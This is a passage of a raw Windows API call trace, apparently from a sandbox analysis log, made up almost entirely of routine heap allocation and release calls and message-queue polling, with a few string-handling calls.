wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0133.287] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc70 [0133.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc70 | out: hHeap=0x25c0000) returned 1 [0133.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f08 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498de8 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249dc50 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc50 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d980 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f38 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ff8 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249dc78 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e60 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249ee48 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc10 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249ee20 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f80 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249b9b0 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498938 | out: hHeap=0x25c0000) returned 1 [0133.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499010 | out: hHeap=0x25c0000) returned 1 [0133.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f98 | out: hHeap=0x25c0000) returned 1 [0133.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498920 | out: hHeap=0x25c0000) returned 1 [0133.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc60 | out: hHeap=0x25c0000) returned 1 [0133.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498908 | out: hHeap=0x25c0000) returned 1 [0133.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bcb0 | out: hHeap=0x25c0000) returned 1 [0133.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498890 | out: hHeap=0x25c0000) returned 1 [0133.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498890 [0133.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498908 [0133.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bcb0 [0133.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249ee20 [0133.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498920 [0133.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc60 [0133.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498920 | out: hHeap=0x25c0000) returned 1 [0133.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249ee48 [0133.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498920 [0133.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f98 [0133.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249b9b0 [0133.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ef0 | out: hHeap=0x25c0000) returned 1 [0133.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dc78 [0133.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc10 [0133.289] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249dc78 | out: hHeap=0x25c0000) returned 1 [0133.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc10 | out: hHeap=0x25c0000) returned 1 [0133.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ef0 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x249bc10 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499010 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498938 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbd0 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc50 [0133.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc50 | out: hHeap=0x25c0000) returned 1 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f80 [0133.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbd0 | out: hHeap=0x25c0000) returned 1 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x2498e60 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dc78 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbd0 [0133.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ec0 | out: hHeap=0x25c0000) returned 1 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d980 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ec0 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ff8 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0133.290] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f38 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc50 [0133.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f38 | out: hHeap=0x25c0000) returned 1 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dc50 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f38 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498de8 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc70 [0133.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249ee70 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc90 [0133.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498ea8 | out: hHeap=0x25c0000) returned 1 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249ee98 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498ea8 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f08 [0133.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249dc50 | out: hHeap=0x25c0000) returned 1 [0133.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc50 | out: hHeap=0x25c0000) returned 1 [0133.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498f38 | out: hHeap=0x25c0000) returned 1 [0133.291] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249dc50 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f38 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc50 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498db8 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc80 [0133.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d70 [0133.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc80 | out: hHeap=0x25c0000) returned 1 [0133.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498d70 | out: hHeap=0x25c0000) returned 1 [0133.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498db8 | out: hHeap=0x25c0000) returned 1 [0133.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e30 | out: hHeap=0x25c0000) returned 1 [0133.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0133.292] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498db8 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc80 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d70 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498968 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc20 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e90 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498fe0 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc00 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498dd0 [0133.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc00 | out: hHeap=0x25c0000) returned 1 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e78 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc00 [0133.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc00 | out: hHeap=0x25c0000) returned 1 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d88 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc00 [0133.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc00 | out: hHeap=0x25c0000) returned 1 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498950 [0133.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc00 [0133.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499040 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498dd0 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498fe0 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e78 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498d88 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e90 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc20 | out: hHeap=0x25c0000) returned 1 [0133.293] lstrlenW (lpString="20") returned 2 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498950 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc00 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499040 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498968 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498d70 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc80 | out: hHeap=0x25c0000) returned 1 [0133.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d70 [0133.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498968 [0133.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc80 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498db8 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e30 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498968 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc80 | out: hHeap=0x25c0000) returned 1 [0133.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498d70 | out: hHeap=0x25c0000) returned 1 [0133.293] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.294] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc80 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d70 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498968 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498db8 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc00 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499040 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498950 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc20 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e90 [0133.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc20 | out: hHeap=0x25c0000) returned 1 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d88 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc20 [0133.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc20 | out: hHeap=0x25c0000) returned 1 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e78 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc20 [0133.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc20 | out: hHeap=0x25c0000) returned 1 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498fe0 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bc20 [0133.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498dd0 [0133.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e90 | out: hHeap=0x25c0000) returned 1 [0133.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498950 | out: hHeap=0x25c0000) returned 1 [0133.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498d88 | out: hHeap=0x25c0000) returned 1 [0133.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e78 | out: hHeap=0x25c0000) returned 1 [0133.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2499040 | out: hHeap=0x25c0000) returned 1 [0133.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc00 | out: hHeap=0x25c0000) returned 1 [0133.295] lstrlenW (lpString="32") returned 2 [0133.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498fe0 | out: hHeap=0x25c0000) returned 1 [0133.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc20 | out: hHeap=0x25c0000) returned 1 [0133.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498dd0 | out: hHeap=0x25c0000) returned 1 [0133.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498db8 | out: hHeap=0x25c0000) returned 1 [0133.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498e30 | out: hHeap=0x25c0000) returned 1 [0133.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bbb0 | out: hHeap=0x25c0000) returned 1 [0133.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498db8 [0133.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbb0 [0133.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498968 | out: hHeap=0x25c0000) returned 1 [0133.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2498d70 | out: hHeap=0x25c0000) returned 1 [0133.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bc80 | out: hHeap=0x25c0000) returned 1 [0133.295] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.295] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498db8 [0133.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc80 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d70 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498968 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc20 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498dd0 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498fe0 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc00 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2499040 [0133.296] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.296] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc80 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498d70 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498968 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498db8 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc00 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e90 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498950 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bc20 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498dd0 [0133.296] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.296] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bbb0 [0133.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498e30 [0133.297] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x2498f20 [0133.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bbd0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: lpMsg=0x8bf490, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf490) returned 0 [0133.297] PeekMessageW (in: 